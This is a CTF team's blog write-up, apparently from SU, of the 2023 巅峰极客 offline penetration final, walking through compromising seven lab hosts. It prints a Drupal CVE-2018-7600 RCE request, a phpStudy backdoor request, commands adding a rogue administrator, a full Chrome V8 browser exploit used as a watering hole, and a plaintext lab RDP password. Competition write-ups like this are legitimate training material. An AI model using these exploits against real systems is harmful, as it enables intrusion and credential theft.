<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><title>2023 巅峰极客决赛  SU WriteUp - su-team</title><link rel="manifest" href="/manifest.json"><meta name="application-name" content="su-team"><meta name="msapplication-TileImage" content="/img/SU4.jpg"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-title" content="su-team"><meta name="apple-mobile-web-app-status-bar-style" content="default"><meta name="description" content="本次巅峰极客决赛为线下渗透赛，我们 SU 取得了 2nd🥈的成绩，感谢队里师傅们的辛苦付出！同时我们也在持续招人，只要你拥有一颗热爱 CTF 的心，都可以加入我们！欢迎发送个人简介至：suers_xctf@126.com 以下是我们 SU 本次 巅峰极客 2023 决赛的 writeup。"><meta property="og:type" content="blog"><meta property="og:title" content="2023 巅峰极客决赛  SU WriteUp"><meta property="og:url" content="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/"><meta property="og:site_name" content="su-team"><meta property="og:description" content="本次巅峰极客决赛为线下渗透赛，我们 SU 取得了 2nd🥈的成绩，感谢队里师傅们的辛苦付出！同时我们也在持续招人，只要你拥有一颗热爱 CTF 的心，都可以加入我们！欢迎发送个人简介至：suers_xctf@126.com 以下是我们 SU 本次 巅峰极客 2023 决赛的 writeup。"><meta property="og:locale" content="en_US"><meta property="og:image" content="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/1.jpg"><meta property="og:image" content="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/2.png"><meta property="og:image" content="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/3.png"><meta property="og:image" content="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/4.jpg"><meta property="og:image" content="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/5.jpg"><meta property="article:published_time" content="2023-08-24T06:02:00.000Z"><meta property="article:modified_time" content="2025-06-09T03:26:23.509Z"><meta property="article:author" content="SUers"><meta property="article:tag" content="渗透"><meta property="twitter:card" content="summary"><meta property="twitter:image:src" content="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/1.jpg"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/"},"headline":"2023 巅峰极客决赛  SU WriteUp","image":["https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/1.jpg","https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/2.png","https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/3.png","https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/4.jpg","https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/5.jpg"],"datePublished":"2023-08-24T06:02:00.000Z","dateModified":"2025-06-09T03:26:23.509Z","author":{"@type":"Person","name":"SUers"},"publisher":{"@type":"Organization","name":"su-team","logo":{"@type":"ImageObject","url":"https://team-su.github.io/img/SU4.jpg"}},"description":"本次巅峰极客决赛为线下渗透赛，我们 SU 取得了 2nd🥈的成绩，感谢队里师傅们的辛苦付出！同时我们也在持续招人，只要你拥有一颗热爱 CTF 的心，都可以加入我们！欢迎发送个人简介至：suers_xctf@126.com 以下是我们 SU 本次 巅峰极客 2023 决赛的 writeup。"}</script><link rel="canonical" href="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/"><link rel="alternate" href="/atom.xml" title="su-team" type="application/atom+xml"><link rel="icon" href="/img/SU4.jpg"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v6.0.0/css/all.css"><link data-pjax rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@11.7.0/styles/atom-one-light.css"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@400;600&amp;family=Source+Code+Pro"><link data-pjax rel="stylesheet" href="/css/default.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><!--!--><!--!--><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/css/justifiedGallery.min.css"><!--!--><!--!--><!--!--><style>.pace{-webkit-pointer-events:none;pointer-events:none;-webkit-user-select:none;-moz-user-select:none;user-select:none}.pace-inactive{display:none}.pace .pace-progress{background:#3273dc;position:fixed;z-index:2000;top:0;right:100%;width:100%;height:2px}</style><script src="https://cdn.jsdelivr.net/npm/pace-js@1.2.4/pace.min.js"></script><!--!--><!--!--><!-- hexo injector head_end start --><script>
  (function () {
      function switchTab() {
          if (!location.hash) {
            return;
          }

          const id = '#' + CSS.escape(location.hash.substring(1));
          const $tabMenu = document.querySelector(`.tabs a[href="${id}"]`);
          if (!$tabMenu) {
            return;
          }

          const $tabMenuContainer = $tabMenu.parentElement.parentElement;
          Array.from($tabMenuContainer.children).forEach($menu => $menu.classList.remove('is-active'));
          Array.from($tabMenuContainer.querySelectorAll('a'))
              .map($menu => document.getElementById($menu.getAttribute("href").substring(1)))
              .forEach($content => $content.classList.add('is-hidden'));

          if ($tabMenu) {
              $tabMenu.parentElement.classList.add('is-active');
          }
          const $activeTab = document.querySelector(id);
          if ($activeTab) {
              $activeTab.classList.remove('is-hidden');
          }
      }
      switchTab();
      window.addEventListener('hashchange', switchTab, false);
  })();
  </script><!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head><body class="is-1-column"><nav class="navbar navbar-main"><div class="container navbar-container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/SU4.jpg" alt="su-team" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">Home</a><a class="navbar-item" href="/archives">Archives</a><a class="navbar-item" href="/tags">Tags</a><a class="navbar-item" href="/about">About</a><a class="navbar-item" href="/members">Members</a></div><div class="navbar-end"><a class="navbar-item" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/team-su"><i class="fab fa-github"></i></a><a class="navbar-item" target="_blank" rel="noopener" title="RSS Feed" href="/atom.xml"><i class="fas fa-rss"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a></div></div></div></nav><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-12"><div class="card"><article class="card-content article" role="article"><div class="article-meta is-size-7 is-uppercase level is-mobile"><div class="level-left"><span class="level-item">Posted&nbsp;<time dateTime="2023-08-24T06:02:00.000Z" title="2023/8/24 14:02:00">2023-08-24</time></span><span class="level-item">Updated&nbsp;<time dateTime="2025-06-09T03:26:23.509Z" title="2025/6/9 11:26:23">2025-06-09</time></span><span class="level-item">13 minutes read (About 1879 words)</span></div></div><h1 class="title is-3 is-size-4-mobile">2023 巅峰极客决赛  SU WriteUp</h1><div class="content"><p>本次巅峰极客决赛为线下渗透赛，我们 SU 取得了 2nd🥈的成绩，感谢队里师傅们的辛苦付出！同时我们也在持续招人，只要你拥有一颗热爱 CTF 的心，都可以加入我们！欢迎发送个人简介至：<a href="mailto:&#x73;&#x75;&#x65;&#114;&#x73;&#x5f;&#x78;&#99;&#116;&#x66;&#x40;&#x31;&#x32;&#x36;&#46;&#x63;&#x6f;&#x6d;">suers_xctf@126.com</a></p>
<p>以下是我们 SU 本次 巅峰极客 2023 决赛的 writeup。</p>
<span id="more"></span>
<hr>
<p>本次巅峰极客决赛为线下渗透赛，我们 SU 取得了 2nd🥈的成绩，感谢队里师傅们的辛苦付出！同时我们也在持续招人，只要你拥有一颗热爱 CTF 的心，都可以加入我们！欢迎发送个人简介至：<a href="mailto:&#115;&#117;&#x65;&#x72;&#x73;&#x5f;&#x78;&#99;&#x74;&#x66;&#x40;&#49;&#x32;&#x36;&#46;&#99;&#x6f;&#109;">suers_xctf@126.com</a></p>
<p>以下是我们 SU 本次 巅峰极客 2023 决赛的 writeup。</p>
<div class="toc">

<!-- toc -->

<ul>
<li><a href="#sai-zhi-miao-shu">赛制描述</a><ul>
<li><a href="#wang-luo-tuo-bu">网络拓扑</a></li>
<li><a href="#1-zhao-pin-wang-zhan-173-20-1-94">1、招聘网站173.20.1.94</a></li>
<li><a href="#2-men-hu-wang-zhan-173-20-1-53">2、门户网站 173.20.1.53</a></li>
<li><a href="#3-ban-gong-dian-nao-15-100-70-10">3、办公电脑 15.100.70.10</a></li>
<li><a href="#4-zhi-hui-shui-li-fu-wu-15-100-70-100">4、智慧水利服务 15.100.70.100</a></li>
<li><a href="#5-gong-cheng-shi-zhan-192-168-2-100">5、工程师站192.168.2.100</a></li>
<li><a href="#6-cao-zuo-yuan-zhan-192-168-2-210">6、操作员站192.168.2.210</a></li>
<li><a href="#7-gong-kong-192-168-2-200">7、工控 192.168.2.200</a></li>
</ul>
</li>
</ul>
<!-- tocstop -->

</div>


<h2><span id="sai-zhi-miao-shu">赛制描述</span><a href="#sai-zhi-miao-shu" class="header-anchor"></a></h2><p>本次比赛一共8小时，上午10点到下午6点，多层网络渗透赛，其中包含了一些工控的点，工控和渗透比重五五开，不过大多都是打渗透拿分。比赛中不允许选手联网，但是有联网区4根网线可以上网下资料，由于赛中不需要交wp，本wp是感觉回忆描述而来，如有偏差，多多包涵。</p>
<h3><span id="wang-luo-tuo-bu">网络拓扑</span><a href="#wang-luo-tuo-bu" class="header-anchor"></a></h3><p>本次比赛没有提供网络拓扑，需要自己攻击一步步推理，但是比赛的中途给了一个题目“比赛中可以根据大屏幕上的拓扑图推测逻辑”，但是屏幕又远又花，而且图很抽象。<br><img src="1.jpg"></p>
<p>所以根据实际情况我们画了一张自己感觉上的图(事后根据回忆画的，有些差异)<br><img src="2.png"></p>
<h3><span id="1-zhao-pin-wang-zhan-173-20-1-94">1、招聘网站173.20.1.94</span><a href="#1-zhao-pin-wang-zhan-173-20-1-94" class="header-anchor"></a></h3><p>因为开场题目只给了这个ip，所以大家都在打这个，这个招聘网站是直接打的drupal远程代码执行 (CVE-2018-7600),在vulhub上有直接的exp</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">POST /user/register?element_parents=account/mail/%23value&amp;ajax_form=1&amp;_wrapper_format=drupal_ajax HTTP/1.1</span><br><span class="line">Host: your-ip:8080</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept: */*</span><br><span class="line">Accept-Language: en</span><br><span class="line">User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 103</span><br><span class="line"></span><br><span class="line">form_id=user_register_form&amp;_drupal_ajax=1&amp;mail[#post_render][]=exec&amp;mail[#type]=markup&amp;mail[#markup]=id</span><br></pre></td></tr></table></figure>
<p>拿下后，本来想尝试拿这台服务器搭建代理，或者提权等，大概过了1小时，发了公告1、招聘网站只是一个签到，不需要深入利用，然后开始扫描173.20.1.x&#x2F;24</p>
<h3><span id="2-men-hu-wang-zhan-173-20-1-53">2、门户网站 173.20.1.53</span><a href="#2-men-hu-wang-zhan-173-20-1-53" class="header-anchor"></a></h3><p>这就很奇怪了，主办方没给公告之前扫了很多次没东西，发了公告后直接扫描到了这个网站，而且给了phpinfo，phpinfo提供了php版本是 5.4.45,存在phpstudy的后门漏洞，poc直接打。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">GET / HTTP/1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Encoding:gzip,deflate</span><br><span class="line">Accept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Cache-Control: max-age=0</span><br><span class="line">Content-Length: 2</span><br></pre></td></tr></table></figure>
<p>这个是windows写马挺怪的，花了一些时间上去，发现是高权限用户，命令执行增加用户</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">net user dddd123 dddqwe@!@# /add</span><br><span class="line">net localgroup administrators dddd123 /add </span><br></pre></td></tr></table></figure>
<p>然后使用猕猴桃可以抓admin到密码，同时存在wireshark软件</p>
<h3><span id="3-ban-gong-dian-nao-15-100-70-10">3、办公电脑 15.100.70.10</span><a href="#3-ban-gong-dian-nao-15-100-70-10" class="header-anchor"></a></h3><p>主办方多次暗示，这个办公电脑会使用浏览器也访问门户。这题应该是最恶心的一个点。<br>因为拿下来门户，可以直接挂黑页水坑攻击，我们在173.20.1.53上挂一个恶意js，让办公电脑访问到rce。<br>首先我们使用门户网站上的wireshark软件抓到办公电脑访问的流量，其中看到了头部带有的ua，显示是89.0.4389.114。<br>刚好是2021年爆出来的chrome 0day rce版本。</p>
<p>中途大概就两三个队打了，主办方考虑到大家没啥环境，就给了cs4.2版本。最良心的是把exp也给了，再到最后直接给了word说明文档</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;</span><br><span class="line">   function gc() &#123;</span><br><span class="line">       for (var i = 0; i &lt; 0x80000; ++i) &#123;</span><br><span class="line">           var a = new ArrayBuffer();</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line">   let shellcode = [不告诉你];</span><br><span class="line">   var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]);</span><br><span class="line">   var wasmModule = new WebAssembly.Module(wasmCode);</span><br><span class="line">   var wasmInstance = new WebAssembly.Instance(wasmModule);</span><br><span class="line">   var main = wasmInstance.exports.main;</span><br><span class="line">   var bf = new ArrayBuffer(8);</span><br><span class="line">   var bfView = new DataView(bf);</span><br><span class="line">   function fLow(f) &#123;</span><br><span class="line">       bfView.setFloat64(0, f, true);</span><br><span class="line">       return (bfView.getUint32(0, true));</span><br><span class="line">  &#125;</span><br><span class="line">   function fHi(f) &#123;</span><br><span class="line">       bfView.setFloat64(0, f, true);</span><br><span class="line">       return (bfView.getUint32(4, true))</span><br><span class="line">  &#125;</span><br><span class="line">   function i2f(low, hi) &#123;</span><br><span class="line">       bfView.setUint32(0, low, true);</span><br><span class="line">       bfView.setUint32(4, hi, true);</span><br><span class="line">       return bfView.getFloat64(0, true);</span><br><span class="line">  &#125;</span><br><span class="line">   function f2big(f) &#123;</span><br><span class="line">       bfView.setFloat64(0, f, true);</span><br><span class="line">       return bfView.getBigUint64(0, true);</span><br><span class="line">  &#125;</span><br><span class="line">   function big2f(b) &#123;</span><br><span class="line">       bfView.setBigUint64(0, b, true);</span><br><span class="line">       return bfView.getFloat64(0, true);</span><br><span class="line">  &#125;</span><br><span class="line">   class LeakArrayBuffer extends ArrayBuffer &#123;</span><br><span class="line">       constructor(size) &#123;</span><br><span class="line">           super(size);</span><br><span class="line">           this.slot = 0xb33f;</span><br><span class="line">      &#125;</span><br><span class="line">  &#125;</span><br><span class="line">   function foo(a) &#123;</span><br><span class="line">       let x = -1;</span><br><span class="line">       if (a) x = 0xFFFFFFFF;</span><br><span class="line">       var arr = new Array(Math.sign(0 - Math.max(0, x, -1)));</span><br><span class="line">       arr.shift();</span><br><span class="line">       let local_arr = Array(2);</span><br><span class="line">       local_arr[0] = 5.1;//4014666666666666</span><br><span class="line">       let buff = new LeakArrayBuffer(0x1000);//byteLength idx=8</span><br><span class="line">       arr[0] = 0x1122;</span><br><span class="line">       return [arr, local_arr, buff];</span><br><span class="line">  &#125;</span><br><span class="line">   for (var i = 0; i &lt; 0x10000; ++i)</span><br><span class="line">       foo(false);</span><br><span class="line">   gc(); gc();</span><br><span class="line">  [corrput_arr, rwarr, corrupt_buff] = foo(true);</span><br><span class="line">   corrput_arr[12] = 0x22444;</span><br><span class="line">   delete corrput_arr;</span><br><span class="line">   function setbackingStore(hi, low) &#123;</span><br><span class="line">       rwarr[4] = i2f(fLow(rwarr[4]), hi);</span><br><span class="line">       rwarr[5] = i2f(low, fHi(rwarr[5]));</span><br><span class="line">  &#125;</span><br><span class="line">   function leakObjLow(o) &#123;</span><br><span class="line">       corrupt_buff.slot = o;</span><br><span class="line">       return (fLow(rwarr[9]) - 1);</span><br><span class="line">  &#125;</span><br><span class="line">   let corrupt_view = new DataView(corrupt_buff);</span><br><span class="line">   let corrupt_buffer_ptr_low = leakObjLow(corrupt_buff);</span><br><span class="line">   let idx0Addr = corrupt_buffer_ptr_low - 0x10;</span><br><span class="line">   let baseAddr = (corrupt_buffer_ptr_low &amp; 0xffff0000) - ((corrupt_buffer_ptr_low &amp; 0xffff0000) % 0x40000) + 0x40000;</span><br><span class="line">   let delta = baseAddr + 0x1c - idx0Addr;</span><br><span class="line">   if ((delta % 8) == 0) &#123;</span><br><span class="line">       let baseIdx = delta / 8;</span><br><span class="line">       this.base = fLow(rwarr[baseIdx]);</span><br><span class="line">  &#125; else &#123;</span><br><span class="line">       let baseIdx = ((delta - (delta % 8)) / 8);</span><br><span class="line">       this.base = fHi(rwarr[baseIdx]);</span><br><span class="line">  &#125;</span><br><span class="line">   let wasmInsAddr = leakObjLow(wasmInstance);</span><br><span class="line">   setbackingStore(wasmInsAddr, this.base);</span><br><span class="line">   let code_entry = corrupt_view.getFloat64(13 * 8, true);</span><br><span class="line">   setbackingStore(fLow(code_entry), fHi(code_entry));</span><br><span class="line">   for (let i = 0; i &lt; shellcode.length; i++) &#123;</span><br><span class="line">       corrupt_view.setUint8(i, shellcode[i]);</span><br><span class="line">  &#125;</span><br><span class="line">   main();</span><br><span class="line">&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>这里生成的shellcode本来是被火绒杀的了，但是比赛到一半主办方说基于很多人没做出来，就挨个把火绒关闭了，hhh。基本上大家都能通过这个直接上线了。</p>
<h3><span id="4-zhi-hui-shui-li-fu-wu-15-100-70-100">4、智慧水利服务 15.100.70.100</span><a href="#4-zhi-hui-shui-li-fu-wu-15-100-70-100" class="header-anchor"></a></h3><p>这一台就有点恶心了上面有4个web题，4个flag。但是因为只有办公电脑通他。我们本地和门户均不通，所以代理这一块就很蛋疼，其实只要代理到了本地就不是很难了。<br>分别是<br>1、80端口 discuz 7.2的rce<br>2、8080端口 禅道cnvd_2020_121325<br>3、3030端口 traggo 这玩意到了后台 不知道怎么打<br>4、8443端口的ofbiz 反序列化<br>这里比较恶心的是禅道其实是后台洞，需要打了discuz然后根目录下拿到flag，flag文件后面留了禅道管理员的密码</p>
<h3><span id="5-gong-cheng-shi-zhan-192-168-2-100">5、工程师站192.168.2.100</span><a href="#5-gong-cheng-shi-zhan-192-168-2-100" class="header-anchor"></a></h3><p>在办公电脑上浏览器打开了192的一个网站，猜测存在192段的地址。然后扫描直接扫到了192.168.2.100存在永恒之蓝，正要去网上下资料的时候，主办方提供了一下“永恒之蓝利用工具”，他真的，我哭死，直接打了上192.168.2.100，</p>
<h3><span id="6-cao-zuo-yuan-zhan-192-168-2-210">6、操作员站192.168.2.210</span><a href="#6-cao-zuo-yuan-zhan-192-168-2-210" class="header-anchor"></a></h3><p>楠哥在上面玩工控的时候发现了一个账号密码信息<br>Operator Station’s<br>IP:192.168.2.210<br>User:monitor<br>Password:nTwn3q3^ph71A<br>这个是操作员站的密码，猜测是rdp的，就直接上了，然后用猕猴桃读密码rdp，管理员桌面存在一个flag和几个软件。</p>
<h3><span id="7-gong-kong-192-168-2-200">7、工控 192.168.2.200</span><a href="#7-gong-kong-192-168-2-200" class="header-anchor"></a></h3><p>在210和110上都有一些工控相关的内容，比如210的管理员账号的浏览器默认打开了192.168.2.200<br><img src="3.png"></p>
<p>至此渗透相关的应该都打了，其实漏洞都不是很难，主要是代理太多很难受。接下来按照题目的描述是在210上存在wireshark软件，使用wireshark抓210和220的通讯流量分析制定的题目。</p>
<p><img src="4.jpg"></p>
<p><img src="5.jpg"></p>
<p>工控wp待续….</p>
</div><div class="article-licensing box"><div class="licensing-title"><p>2023 巅峰极客决赛  SU WriteUp</p><p><a href="https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/">https://team-su.github.io/2023/08/24/2023-08-24-DFJKfinal/</a></p></div><div class="licensing-meta level is-mobile"><div class="level-left"><div class="level-item is-narrow"><div><h6>Author</h6><p>SUers</p></div></div><div class="level-item is-narrow"><div><h6>Posted on</h6><p>2023-08-24</p></div></div><div class="level-item is-narrow"><div><h6>Updated on</h6><p>2025-06-09</p></div></div><div class="level-item is-narrow"><div><h6>Licensed under</h6><p><a class="icons" rel="noopener" target="_blank" title="Creative Commons" href="https://creativecommons.org/"><i class="icon fab fa-creative-commons"></i></a><a class="icons" rel="noopener" target="_blank" title="Attribution" href="https://creativecommons.org/licenses/by/4.0/"><i class="icon fab fa-creative-commons-by"></i></a><a class="icons" rel="noopener" target="_blank" title="Noncommercial" href="https://creativecommons.org/licenses/by-nc/4.0/"><i class="icon fab fa-creative-commons-nc"></i></a></p></div></div></div></div></div><div class="article-tags is-size-7 mb-4"><span class="mr-2">#</span><a class="link-muted mr-2" rel="tag" href="/tags/%E6%B8%97%E9%80%8F/">渗透</a></div><!--!--></article></div><!--!--><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2023/10/30/2023-10-28-ACTF/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">2023 ACTF SU WriteUp</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2023/08/24/2023-05-17gyb/"><span class="level-item">2023 贵阳大数据网络安全精英对抗赛 SU Writeup</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><!--!--><div class="column column-right  order-3 is-sticky"><!--!--></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/SU4.jpg" alt="su-team" height="28"></a><p class="is-size-7"><span>&copy; 2025 SUers</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p><p class="is-size-7">© 2016</p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/team-su"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script data-pjax src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script data-pjax src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.10.0/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.8.1/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.min.js"></script><script src="/js/pjax.js"></script><!--!--><!--!--><!--!--><script data-pjax src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script data-pjax src="/js/insight.js" defer></script><script data-pjax>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>